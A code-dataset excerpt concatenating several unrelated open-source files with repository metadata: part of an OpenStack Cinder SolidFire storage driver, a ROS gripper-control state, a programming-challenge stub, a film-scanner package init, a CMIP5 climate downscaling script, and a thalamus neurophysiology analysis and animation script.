return self.target_driver.ensure_export(context, volume, None)
def retype(self, ctxt, volume, new_type, diff, host):
"""Convert the volume to be of the new type.
Returns a boolean indicating whether the retype occurred.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param new_type: A dictionary describing the volume type to convert to
:param diff: A dictionary with the difference between the two types
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities (Not Used).
"""
qos = {}
attributes = {}
sfaccount = self._get_sfaccount(volume['project_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
raise exception.VolumeNotFound(volume_id=volume['id'])
attributes = sf_vol['attributes']
attributes['retyped_at'] = timeutils.utcnow().isoformat()
params = {'volumeID': sf_vol['volumeID']}
qos = self._set_qos_by_volume_type(ctxt, new_type['id'])
if qos:
params['qos'] = qos
for k, v in qos.items():
attributes[k] = str(v)
params['attributes'] = attributes
self._issue_api_request('ModifyVolume', params)
return True
def manage_existing(self, volume, external_ref):
"""Manages an existing SolidFire Volume (import to Cinder).
Renames the Volume to match the expected name for the volume.
Also need to consider things like QoS, Emulation, account/tenant.
"""
sfid = external_ref.get('source-id', None)
sfname = external_ref.get('name', None)
if sfid is None:
raise exception.SolidFireAPIException(_("Manage existing volume "
"requires 'source-id'."))
# First get the volume on the SF cluster (MUST be active)
params = {'startVolumeID': sfid,
'limit': 1}
data = self._issue_api_request('ListActiveVolumes', params)
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
sf_ref = data['result']['volumes'][0]
sfaccount = self._create_sfaccount(volume['project_id'])
attributes = {}
qos = {}
if (self.configuration.sf_allow_tenant_qos and
volume.get('volume_metadata')is not None):
qos = self._set_qos_presets(volume)
ctxt = context.get_admin_context()
type_id = volume.get('volume_type_id', None)
if type_id is not None:
qos = self._set_qos_by_volume_type(ctxt, type_id)
import_time = volume['created_at'].isoformat()
attributes = {'uuid': volume['id'],
'is_clone': 'False',
'os_imported_at': import_time,
'old_name': sfname}
if qos:
for k, v in qos.items():
attributes[k] = str(v)
params = {'name': volume['name'],
'volumeID': sf_ref['volumeID'],
'accountID': sfaccount['accountID'],
'enable512e': self.configuration.sf_emulate_512,
'attributes': attributes,
'qos': qos}
data = self._issue_api_request('ModifyVolume',
params, version='5.0')
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
return self._get_model_info(sfaccount, sf_ref['volumeID'])
def manage_existing_get_size(self, volume, external_ref):
"""Return size of an existing LV for manage_existing.
existing_ref is a dictionary of the form:
{'name': <name of existing volume on SF Cluster>}
"""
sfid = external_ref.get('source-id', None)
if sfid is None:
raise exception.SolidFireAPIException(_("Manage existing get size "
"requires 'id'."))
params = {'startVolumeID': int(sfid),
'limit': 1}
data = self._issue_api_request('ListActiveVolumes', params)
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
sf_ref = data['result']['volumes'][0]
return int(sf_ref['totalSize']) / int(units.Gi)
def unmanage(self, volume):
"""Mark SolidFire Volume as unmanaged (export from Cinder)."""
sfaccount = self._get_sfaccount(volume['project_id'])
if sfaccount is None:
LOG.error(_LE("Account for Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"unmanage operation!"), volume['id'])
raise exception.SolidFireAPIException(_("Failed to find account "
"for volume."))
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
raise exception.VolumeNotFound(volume_id=volume['id'])
export_time = timeutils.utcnow().isoformat()
attributes = sf_vol['attributes']
attributes['os_exported_at'] = export_time
params = {'volumeID': int(sf_vol['volumeID']),
'attributes': attributes}
data = self._issue_api_request('ModifyVolume',
params, version='5.0')
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
# #### Interface methods for transport layer #### #
# TODO(jdg): SolidFire can mix and do iSCSI and FC on the
# same cluster, we'll modify these later to check based on
# the volume info if we need an FC target driver or an
# iSCSI target driver
def ensure_export(self, context, volume):
return self.target_driver.ensure_export(context, volume, None)
def create_export(self, context, volume, connector):
return self.target_driver.create_export(
context,
volume,
None)
def remove_export(self, context, volume):
return self.target_driver.remove_export(context, volume)
def initialize_connection(self, volume, connector):
return self.target_driver.initialize_connection(volume, connector)
def validate_connector(self, connector):
return self.target_driver.validate_connector(connector)
def terminate_connection(self, volume, connector, **kwargs):
return self.target_driver.terminate_connection(volume, connector,
**kwargs)
class SolidFireISCSI(iscsi_driver.SanISCSITarget):
def __init__(self, *args, **kwargs):
super(SolidFireISCSI, self).__init__(*args, **kwargs)
self.sf_driver = kwargs.get('solidfire_driver')
def _do_iscsi_export(self, volume):
sfaccount = self.sf_driver._get_sfaccount(volume['project_id'])
model_update = {}
model_update['provider_auth'] = ('CHAP %s %s'
% (sfaccount['username'],
sfaccount['targetSecret']))
return model_update
def create_export(self, context, volume, volume_path):
return self._do_iscsi_export(volume)
def ensure_export(self, context, volume, volume_path):
try:
return self._do_iscsi_export(volume)
except exception.SolidFireAPIException:
return None
# Following are abc's that we make sure are caught and
# paid attention to. In our case we don't use them
# so just stub them out here.
def remove_export(self, context, volume):
pass
def terminate_connection(self, volume, connector, **kwargs):
pass
|
apache-2.0
| -2,846,976,939,667,799,600 | 39.789269 | 79 | 0.551196 | false |
amasiero/approach_control
|
approach_control_manipulator/nodes/approach_control_manipulator/OpenGripper.py
|
1
|
1219
|
#!/usr/bin/env python
import rospy
import smach
import numpy as np
from std_msgs.msg import Float64
from dynamixel_msgs.msg import JointState
class OpenGripper(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes = ['success', 'in_progress', 'fail'])
self.joint4 = rospy.Publisher('/tilt6_controller/command', Float64, queue_size = 10)
self.count = 0
self.error_default = 0.04
self.pos = 0
self.error = 0
rospy.Rate(5)
def callback(self, data):
self.pos = data.current_pos
self.error = data.error
def execute(self, userdata):
rospy.loginfo('Opening Gripper')
rospy.sleep(0.1)
rospy.Subscriber('/tilt6_controller/state', JointState, self.callback)
self.joint4.publish(2.61)
rospy.sleep(4)
rospy.loginfo('Position: %f', np.round(self.pos, 2))
rospy.loginfo('Error: %f', np.absolute(self.error))
if np.absolute(self.error) < self.error_default:
rospy.loginfo('Gripper open')
return 'success'
elif self.count < 1:
self.count += 1
return 'in_progress'
else:
return 'fail'
|
gpl-2.0
| 2,137,452,575,474,509,000 | 26.111111 | 92 | 0.59557 | false |
DayGitH/Python-Challenges
|
DailyProgrammer/DP20140702B.py
|
1
|
2885
|
"""
[7/2/2014] Challenge #169 [Intermediate] Home-row Spell Check
https://www.reddit.com/r/dailyprogrammer/comments/29od55/722014_challenge_169_intermediate_homerow_spell/
#User Challenge:
Thanks to /u/Fruglemonkey. This is from our idea subreddit.
http://www.reddit.com/r/dailyprogrammer_ideas/comments/26pak5/intermediate_homerow_spell_check/
#Description:
Aliens from Mars have finally found a way to contact Earth! After many years studying our computers, they've finally
created their own computer and keyboard to send us messages. Unfortunately, because they're new to typing, they often
put their fingers slightly off in the home row, sending us garbled messages! Otherwise, these martians have impeccable
spelling. You are tasked to create a spell-checking system that recognizes words that have been typed off-center in the
home row, and replaces them with possible outcomes.
#Formal Input:
You will receive a string that may have one or more 'mis-typed' words in them. Each mis-typed word has been shifted as
if the hands typing them were offset by 1 or 2 places on a QWERTY keyboard.
Words wrap based on the physical line of a QWERTY keyboard. So A left shift of 1 on Q becomes P. A right shift of L
becomes A.
#Formal Output:
The correct string, with corrected words displayed in curly brackets. If more than one possible word for a mispelling
is possible, then display all possible words.
#Sample Input:
The quick ntpem fox jumped over rgw lazy dog.
#Sample Output:
The quick {brown} fox jumped over {the} lazy dog.
#Challenge Input:
Gwkki we are hyptzgsi martians rt zubq in qrsvr.
#Challenge Input Solution:
{Hello} we are {friendly} martians {we} {come} in {peace}
#Alternate Challenge Input:
A oweaib who fprd not zfqzh challenges should mt ewlst to kze
#Alternate Challenge Output:
A {person} who {does} not {check} challenges should {be} {ready} to {act}
#Dictionary:
Good to have a source of words. Some suggestions.
* [enable1.txt] (https://code.google.com/p/dotnetperls-controls/downloads/detail?name=enable1.txt)
* [British English Word List] (http://www.curlewcommunications.co.uk/wordlist.html)
#FAQ:
As you can imagine I did not proof-read this. So lets clear it up.
Shifts can be 1 to 2 spots away. The above only says "1" -- it looks like it can be 1-2 so lets just assume it can be
1-2 away.
If you shift 1 Left on a Q - A - Z you get a P L M -- so it will wrap on the same "Row" of your QWERTY keyboard.
If you shift 2 Left on a W - S - X you get P L M.
If you Shift 1 Right on P L M -- you get Q A Z. If you shift 2 right on O K N - you get Q A Z.
The shift is only on A-Z keys. We will ignore others.
enable1.txt has "si" has a valid word. Delete that word from the dictionary to make it work.
I will be double checking the challenge input - I will post an alternate one as well.
"""
def main():
pass
if __name__ == "__main__":
main()
|
mit
| -7,657,910,540,772,636,000 | 49.614035 | 119 | 0.754939 | false |
weaverch/super8scan
|
Scripts/Capture/super8scan/__init__.py
|
1
|
2102
|
###################################################################
# This file is a modification of the file "__init__.py" from the #
# RPi Telecine project. I've included that project's header and #
# copyright below. #
###################################################################
# RPi Telecine Library package
#
#
# Copyright (c) 2015, Jason Lane
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Configuration handling
from super8scan.config import (
s8sConfig,
)
from super8scan.camera import (
s8sCamera,
)
from super8scan.perforation import (
s8sPerforation,
)
|
bsd-3-clause
| -6,091,237,985,187,468,000 | 41.04 | 83 | 0.696004 | false |
ua-snap/downscale
|
snap_scripts/downscaling_L48/downscale_cmip5_L48.py
|
1
|
6512
|
# downscale the prepped cmip5 data used in running the TEM model (IEM)
# author: Michael Lindgren
if __name__ == '__main__':
import glob, os, rasterio, itertools
from functools import partial
import downscale
from downscale import preprocess
import numpy as np
import argparse
# # parse the commandline arguments
parser = argparse.ArgumentParser( description='downscale the AR5-CMIP5 data to the AKCAN extent required by SNAP' )
parser.add_argument( "-b", "--base_dir", action='store', dest='base_dir', type=str, help="base directory where data is stored in structured folders" )
parser.add_argument( "-m", "--model", action='store', dest='model', type=str, help="cmip5 model name (exact)" )
parser.add_argument( "-v", "--variable", action='store', dest='variable', type=str, help="cmip5 variable name (exact)" )
parser.add_argument( "-s", "--scenario", action='store', dest='scenario', type=str, help="cmip5 scenario name (exact)" )
parser.add_argument( "-u", "--units", action='store', dest='units', type=str, help="cmip5 units name (exact)" )
parser.add_argument( "-met", "--metric", action='store', dest='metric', type=str, help="cmip5 metric name (exact)" )
parser.add_argument( "-lev", "--level", action='store', dest='level', type=int, help="optional level to extract for downscaling" )
parser.add_argument( "-levn", "--level_name", action='store', dest='level_name', type=str, help="name of level variable" )
args = parser.parse_args()
# unpack the args
variable = args.variable
scenario = args.scenario
model = args.model
units = args.units
metric = args.metric
base_dir = args.base_dir
level = args.level
level_name = args.level_name
if level is not None:
level = float( level )
# hardwired ARGS -- CMIP5
project = 'ar5'
interp = False
find_bounds = False
fix_clim = False
aoi_mask = None # for precip data only
anom = True # write out anoms (True) or not (False)
# # # FOR TESTING # # #
# base_dir = '/workspace/Shared/Tech_Projects/DeltaDownscaling/project_data'
# variable = 'clt'
# scenario = 'historical'
# model = 'GFDL-CM3'
# units = 'pct'
# metric = 'mean'
# level_name = None
# level = None
# # level = 1000 # mb / Pa
# # level_name = 'plev'
# # if level is not None:
# # level = float( level )
# # # # # # END TESTING # # #
# some setup args
base_path = os.path.join( base_dir,'cmip5','prepped' )
output_dir = os.path.join( base_dir, 'insolation_L48', 'downscaled_L48' )
variables = [ variable ]
scenarios = [ scenario ]
models = [ model ]
# modelnames is simply the string name to put in the output filenaming if that differs from the modelname
# used in querying the file which is the models list variable
all_models = [ 'IPSL-CM5A-LR', 'MRI-CGCM3', 'GISS-E2-R', 'GFDL-CM3', 'CCSM4' ] # temp for distributed run
modelnames = [ 'IPSL-CM5A-LR', 'MRI-CGCM3', 'GISS-E2-R', 'GFDL-CM3', 'NCAR-CCSM4' ]
modelnames = dict( zip( all_models, modelnames ) )
if not os.path.exists( output_dir ):
os.makedirs( output_dir )
os.chdir( output_dir )
for variable, model, scenario in itertools.product( variables, models, scenarios ):
modelname = modelnames[ model ]
# SETUP BASELINE
cru_cl20_varnames = {'hur':'reh', 'clt':'clt'} # we only support these variables for now...
clim_path = os.path.join( base_dir, 'insolation_L48', 'climatologies', cru_cl20_varnames[variable] )
filelist = glob.glob( os.path.join( clim_path, '*.tif' ) )
filelist = [ i for i in filelist if '_14_' not in i ] # remove the GD ANNUAL _14_ file.
baseline = downscale.Baseline( filelist )
input_path = os.path.join( base_path, model, scenario, variable )
output_path = os.path.join( output_dir, model, scenario, variable )
if not os.path.exists( output_path ):
os.makedirs( output_path )
print( input_path )
# list files for this set of downscaling -- one per folder
fn, = glob.glob( os.path.join( input_path, '*.nc' ) )
if 'historical' in scenario:
historical = downscale.Dataset( fn, variable, model, scenario, project=project, units=units,
metric=metric, begin=1900, end=2005, level_name=level_name, level=level )
future = None
else:
# get the historical data for anomalies
historical_fn, = glob.glob( os.path.join( os.path.dirname( fn ).replace( scenario, 'historical' ), '*.nc' ) )
historical = downscale.Dataset( historical_fn, variable, model, scenario, project=project, units=units,
metric=metric, begin=1900, end=2005, level_name=level_name, level=level )
future = downscale.Dataset( fn, variable, model, scenario, project=project, units=units, metric=metric,
begin=2006, end=2100, level_name=level_name, level=level )
# convert from Kelvin to Celcius
if variable == 'tas':
if historical:
historical.ds[ variable ] = historical.ds[ variable ] - 273.15
historical.ds[ variable ][ 'units' ] = units
if future:
future.ds[ variable ] = future.ds[ variable ] - 273.15
future.ds[ variable ][ 'units' ] = units
# DOWNSCALE
mask = rasterio.open( baseline.filelist[0] ).read_masks( 1 )
clim_begin = '1961'
clim_end = '1990'
if variable == 'pr':
rounder = np.rint
downscaling_operation = 'mult'
elif variable in ['hur','cld','clt']:
rounder = partial( np.round, decimals=1 )
downscaling_operation = 'mult'
else:
rounder = partial( np.round, decimals=1 )
downscaling_operation = 'add'
def round_it( x, mask ):
arr = np.ma.masked_array( data=x, mask=mask )
return rounder( arr )
round_data = partial( round_it, mask=( mask==0 ) )
def round_data_clamp_hur( x ):
x = round_data( x )
x[ x < 0.0 ] = 0.0
x[ x > 100.0 ] = 95.0 # per Stephanie McAfee
return x
def round_data_clamp_clt( x ):
x = round_data( x )
x[ x < 0.0 ] = 0.0
x[ x > 100.0 ] = 100.0 # per Stephanie McAfee
return x
if variable == 'hur':
post_downscale_function = round_data_clamp_hur
elif variable == 'clt':
post_downscale_function = round_data_clamp_clt
else:
post_downscale_function = round_data
ar5 = downscale.DeltaDownscale( baseline, clim_begin, clim_end, historical, future,
downscaling_operation=downscaling_operation, mask=mask, mask_value=0, ncpus=64,
src_crs={'init':'epsg:4326'}, src_nodata=None, dst_nodata=None,
post_downscale_function=post_downscale_function, varname=variable, modelname=modelname,
anom=anom, interp=interp, find_bounds=find_bounds, fix_clim=fix_clim, aoi_mask=aoi_mask )
ar5.downscale( output_dir=output_path )
|
mit
| -4,572,493,743,222,169,000 | 37.311765 | 151 | 0.670147 | false |
gviejo/ThalamusPhysio
|
python/main_make_MAPinfo.py
|
1
|
14284
|
#!/usr/bin/env python
'''
File name: main_make_movie.py
Author: Guillaume Viejo
Date created: 09/10/2017
Python Version: 3.5.2
To make shank mapping
'''
import numpy as np
import pandas as pd
# from matplotlib.pyplot import plot,show,draw
import scipy.io
from functions import *
from pylab import *
from sklearn.decomposition import PCA
import _pickle as cPickle
import neuroseries as nts
import sys
sys.exit()
###############################################################################################################
# LOADING DATA
###############################################################################################################
data_directory = '/mnt/DataGuillaume/MergedData/'
datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#')
theta_mod, theta_ses = loadThetaMod('/mnt/DataGuillaume/MergedData/THETA_THAL_mod.pickle', datasets, return_index=True)
swr_mod, swr_ses = loadSWRMod('/mnt/DataGuillaume/MergedData/SWR_THAL_corr.pickle', datasets, return_index=True)
spind_mod, spind_ses = loadSpindMod('/mnt/DataGuillaume/MergedData/SPINDLE_mod.pickle', datasets, return_index=True)
spike_spindle_phase = cPickle.load(open('/mnt/DataGuillaume/MergedData/SPIKE_SPINDLE_PHASE.pickle', 'rb'))
spike_theta_phase = cPickle.load(open('/mnt/DataGuillaume/MergedData/SPIKE_THETA_PHASE.pickle', 'rb'))
nbins = 400
binsize = 5
times = np.arange(0, binsize*(nbins+1), binsize) - (nbins*binsize)/2
theta = pd.DataFrame( index = theta_ses['rem'],
columns = ['phase', 'pvalue', 'kappa'],
data = theta_mod['rem'])
# filtering swr_mod
swr = pd.DataFrame( columns = swr_ses,
index = times,
data = gaussFilt(swr_mod, (10,)).transpose())
# Cut swr_mod from -500 to 500
swr = swr.loc[-500:500]
# CHECK FOR NAN
tmp1 = swr.columns[swr.isnull().any()].values
tmp2 = theta.index[theta.isnull().any(1)].values
# CHECK P-VALUE
tmp3 = theta.index[(theta['pvalue'] > 1).values].values
tmp = np.unique(np.concatenate([tmp1,tmp2,tmp3]))
# copy and delete
if len(tmp):
swr_modth = swr.drop(tmp, axis = 1)
theta_modth = theta.drop(tmp, axis = 0)
swr_modth_copy = swr_modth.copy()
neuron_index = swr_modth.columns
times = swr_modth.loc[-500:500].index.values
###############################################################################################################
# MOVIE + jPCA for each animal
###############################################################################################################
mouses = ['Mouse12', 'Mouse17', 'Mouse20', 'Mouse32']
# times = np.arange(0, 1005, 5) - 500 # BAD
interval_to_cut = { 'Mouse12':[89,128],
'Mouse17':[84,123],
'Mouse20':[92,131],
'Mouse32':[80,125]}
movies = dict.fromkeys(mouses)
rXX = dict.fromkeys(mouses)
maps = dict.fromkeys(mouses)
headdir = dict.fromkeys(mouses)
adnloc = dict.fromkeys(mouses)
xpos = dict.fromkeys(mouses)
ypos = dict.fromkeys(mouses)
xpos_shank = dict.fromkeys(mouses)
ypos_shank = dict.fromkeys(mouses)
xpos_phase = dict.fromkeys(mouses)
ypos_phase = dict.fromkeys(mouses)
theta_dens = dict.fromkeys(mouses)
hd_neurons_index = []
for m in mouses:
print(m)
depth = pd.DataFrame(index = np.genfromtxt(data_directory+m+"/"+m+".depth", dtype = 'str', usecols = 0),
data = np.genfromtxt(data_directory+m+"/"+m+".depth", usecols = 1),
columns = ['depth'])
neurons = np.array([n for n in neuron_index if m in n])
sessions = np.unique([n.split("_")[0] for n in neuron_index if m in n])
nb_bins = 201
swr_shank = np.zeros((len(sessions),8,nb_bins))
# nb_bins = interval_to_cut[m][1] - interval_to_cut[m][0]
theta_shank = np.zeros((len(sessions),8,30)) # that's radian bins here
spindle_shank = np.zeros((len(sessions),8,30)) # that's radian bins here
bins_phase = np.linspace(0.0, 2*np.pi+0.00001, 31)
count_total = np.zeros((len(sessions),8))
hd_neurons = np.zeros((len(sessions),8))
amplitute = np.zeros((len(sessions),8))
mod_theta = np.zeros((len(sessions),8))
###########################################################################################################
# JPCA
###########################################################################################################
rX,phi_swr,dynamical_system = jPCA(swr_modth[neurons].values.transpose(), times)
phi_swr = pd.DataFrame(index = neurons, data = phi_swr)
###########################################################################################################
# VARIOUS
###########################################################################################################
for s in sessions:
generalinfo = scipy.io.loadmat(data_directory+m+"/"+s+'/Analysis/GeneralInfo.mat')
shankStructure = loadShankStructure(generalinfo)
spikes,shank = loadSpikeData(data_directory+m+"/"+s+'/Analysis/SpikeData.mat', shankStructure['thalamus'])
hd_info = scipy.io.loadmat(data_directory+m+'/'+s+'/Analysis/HDCells.mat')['hdCellStats'][:,-1]
hd_info_neuron = np.array([hd_info[n] for n in spikes.keys()])
shankIndex = np.array([shank[n] for n in spikes.keys()]).flatten()
if np.max(shankIndex) > 8 : sys.exit("Invalid shank index for thalamus" + s)
shank_to_neurons = {k:np.array(list(spikes.keys()))[shankIndex == k] for k in np.unique(shankIndex)}
for k in shank_to_neurons.keys():
count_total[np.where(sessions== s)[0][0],k] = len(shank_to_neurons[k])
hd_neurons[np.where(sessions== s)[0][0],k] = np.sum(hd_info_neuron[shankIndex == k])
mod_theta[np.where(sessions== s)[0][0],k] = (theta.loc[[s+'_'+str(i) for i in shank_to_neurons[k]]]['pvalue'] < 0.05).sum()
# amplitute[np.where(sessions==s)[0][0],k] = (swr.loc[shank_to_neurons[k]].var(1)).mean()
###########################################################################################################
# SWR MOD
###########################################################################################################
neurons_mod_in_s = np.array([n for n in neurons if s in n])
shank_to_neurons = {k:np.array([n for n in neurons_mod_in_s if shankIndex[int(n.split("_")[1])] == k]) for k in np.unique(shankIndex)}
for k in shank_to_neurons.keys():
# if np.sum(hd_info_neuron[[int(n.split("_")[1]) for n in shank_to_neurons[k]]]):
# print(s, k, len(shank_to_neurons[k]))
# if s == 'Mouse17-130204': sys.exit()
if len(shank_to_neurons[k]):
swr_shank[np.where(sessions== s)[0][0],k] = swr_modth[shank_to_neurons[k]].mean(1).values
###########################################################################################################
# THETA MOD
###########################################################################################################
for k in shank_to_neurons.keys():
if len(shank_to_neurons[k]):
for n in shank_to_neurons[k]:
phi = spike_theta_phase['rem'][n]
phi[phi<0.0] += 2*np.pi
index = np.digitize(phi, bins_phase)-1
for t in index:
theta_shank[np.where(sessions == s)[0][0],k,t] += 1.0
###########################################################################################################
# SPIND HPC MOD
###########################################################################################################
for k in shank_to_neurons.keys():
if len(shank_to_neurons[k]):
for n in shank_to_neurons[k]:
if n in list(spike_spindle_phase.keys()):
phi = spike_spindle_phase['hpc'][n]
phi[phi<0.0] += 2*np.pi
index = np.digitize(phi, bins_phase)-1
for t in index:
spindle_shank[np.where(sessions == s)[0][0],k,t] += 1.0
for t in range(len(times)):
swr_shank[:,:,t] = np.flip(swr_shank[:,:,t], 1)
for t in range(theta_shank.shape[-1]):
theta_shank[:,:,t] = np.flip(theta_shank[:,:,t], 1)
spindle_shank[:,:,t] = np.flip(spindle_shank[:,:,t], 1)
# saving
movies[m] = { 'swr' : swr_shank ,
'theta' : theta_shank ,
'spindle': spindle_shank }
hd_neurons = hd_neurons/(count_total+1.0)
mod_theta = mod_theta/(count_total+1.0)
rXX[m] = rX
maps[m] = { 'total': np.flip(count_total,1),
'x' : np.arange(0.0, 8*0.2, 0.2),
'y' : depth.loc[sessions].values.flatten()
}
headdir[m] = np.flip(hd_neurons, 1)
theta_dens[m] = np.flip(mod_theta, 1)
for m in movies.keys():
datatosave = { 'movies':movies[m],
'total':maps[m]['total'],
'x':maps[m]['x'],
'y':maps[m]['y'],
'headdir':headdir[m],
'jpc':rXX[m],
'theta_dens':theta_dens[m]
}
cPickle.dump(datatosave, open("../data/maps/"+m+".pickle", 'wb'))
sys.exit()
m = 'Mouse12'
space = 0.01
thl_lines = np.load("../figures/thalamus_lines.mat.npy").sum(2)
xlines, ylines, thl_lines = interpolate(thl_lines, np.linspace(maps[m]['x'].min(), maps[m]['x'].max(), thl_lines.shape[1]),
np.linspace(maps[m]['y'].min(), maps[m]['y'].max(), thl_lines.shape[0]), 0.001)
thl_lines -= thl_lines.min()
thl_lines /= thl_lines.max()
thl_lines[thl_lines>0.6] = 1.0
thl_lines[thl_lines<=0.6] = 0.0
xnew, ynew, total = interpolate(maps[m]['total'].copy(), maps[m]['x'], maps[m]['y'], space)
# total -= total.min()
# total /= total.max()
total = softmax(total, 20.0, 0.2)
for k in movies[m].keys():
movies[m][k] = filter_(movies[m][k], (2,2,5))
filmov = dict.fromkeys(movies[m].keys())
for k in filmov:
tmp = []
for t in range(movies[m][k].shape[-1]):
# frame = movies[m][k][:,:,t] / (maps[m]['total']+1.0)
frame = movies[m][k][:,:,t]
xnew, ynew, frame = interpolate(frame, maps[m]['x'], maps[m]['y'], space)
tmp.append(frame)
tmp = np.array(tmp)
filmov[k] = filter_(tmp, 5)
filmov[k] = filmov[k] - np.min(filmov[k])
filmov[k] = filmov[k] / np.max(filmov[k] + 1e-8)
filmov[k] = softmax(filmov[k], 10, 0.5)
xnew, ynew, head = interpolate(headdir[m].copy(), maps[m]['x'], maps[m]['y'], space)
head[head < np.percentile(head, 90)] = 0.0
# sys.exit()
# figure()
# index = np.arange(0,20,1)+90
# for i in range(len(index)):
# subplot(4,5,i+1)
# # imshow(get_rgb(filmov['swr'][index[i]].copy(), total.copy(), np.ones_like(total), 0.83),
# imshow(filmov['swr'][index[i]].copy(),
# aspect = 'auto',
# origin = 'upper',
# cmap = 'jet', vmin = 0.0, vmax = 1.0)
# # extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))
# title("t = "+str(times[index[i]])+" ms")
# # contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))
# # contour(thl_lines, aspect = 'equal', origin = 'upper', extent = (xlines[0], xlines[-1], ylines[-1], ylines[0]), colors = 'white')
# # show(thl_lines, aspect = 'equal', origin = 'upper', extent = (xlines[0], xlines[-1], ylines[-1], ylines[0]))
# show()
from matplotlib import animation, rc
from IPython.display import HTML, Image
rc('animation', html='html5')
fig, axes = plt.subplots(1,1)
images = [axes.imshow(get_rgb(filmov['swr'][0].copy(), np.ones_like(total), total, 0.65), vmin = 0.0, vmax = 1.0, aspect = 'equal', origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))]
# images = [axes.imshow(filmov['swr'][0], aspect = 'equal', origin = 'upper', cmap = 'jet', vmin = 0.0, vmax = 1.0, extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))]
axes.contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]), cmap = 'gist_gray')
axes.contour(thl_lines, aspect = 'equal', origin = 'upper', extent = (xlines[0], xlines[-1], ylines[-1], ylines[0]), colors = 'white')
def init():
images[0].set_data(get_rgb(filmov['swr'][0].copy(), np.ones_like(total), total, 0.65))
# images[0].set_data(filmov['swr'][0])
return images
def animate(t):
images[0].set_data(get_rgb(filmov['swr'][t].copy(), np.ones_like(total), total, 0.65))
# images[0].set_data(filmov['swr'][t])
return images
anim = animation.FuncAnimation(fig, animate, init_func=init,
frames=range(len(times)), interval=0, blit=False, repeat_delay = 5000)
anim.save('../figures/swr_mod_'+m+'.gif', writer='imagemagick', fps=60)
show()
sys.exit()
sys.exit()
from matplotlib import animation, rc
from IPython.display import HTML, Image
rc('animation', html='html5')
fig, axes = plt.subplots(1,3)
images = []
for k, i in zip(['swr', 'theta', 'spindle'], range(3)):
images.append(axes[i].imshow(filmov[k][0], aspect = 'auto', cmap = 'jet', origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0])))
contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))
def init():
for i in range(3): images[i].set_data(filmov[k][0])
contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))
return images
def animate(t):
for i in range(3): images[i].set_data(filmov[k][t])
contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))
return images
anim = animation.FuncAnimation(fig, animate, init_func=init,
frames=range(len(times)), interval=0, blit=True, repeat_delay = 0)
sys.exit()
m = 'Mouse12'
images = []
# for i in range(len(mouses)):
# lines1.append(axes[0,i].plot([],[],'o-')[0])
# lines2.append(axes[0,i].plot([],[],'o-')[0])
# axes[0,i].set_xlim(-500, 500)
# axes[0,i].set_ylim(rXX[mouses[i]].min(), rXX[mouses[i]].max())
images.append(axes.imshow(movies[m]['spindle'][:,:,0], aspect = 'auto', cmap = 'jet'))
def init():
# for i, m in zip(range(len(mouses)), mouses):
# images[i].set_data(movies[m][0])
# lines1[i].set_data(times[0], rXX[m][0,0])
# lines2[i].set_data(times[0], rXX[m][0,1])
# return images+lines1+lines2
images[0].set_data(movies[m]['spindle'][:,:,0])
return images
def animate(t):
# for i, m in zip(range(len(mouses)), mouses):
# images[i].set_data(movies[m][t])
# lines1[i].set_data(times[0:t], rXX[m][0:t,0])
# lines2[i].set_data(times[0:t], rXX[m][0:t,1])
images[0].set_data(movies[m]['spindle'][:,:,t])
return images
anim = animation.FuncAnimation(fig, animate, init_func=init,
frames=movies[m]['spindle'].shape[-1], interval=0, blit=True, repeat_delay = 1)
show()
# anim.save('../figures/animation_swr_mod_jpca.gif', writer='imagemagick', fps=60)
|
gpl-3.0
| -2,535,166,758,625,621,500 | 36.989362 | 199 | 0.556007 | false |
pepeportela/edx-platform
|
common/djangoapps/student/tests/test_reset_password.py
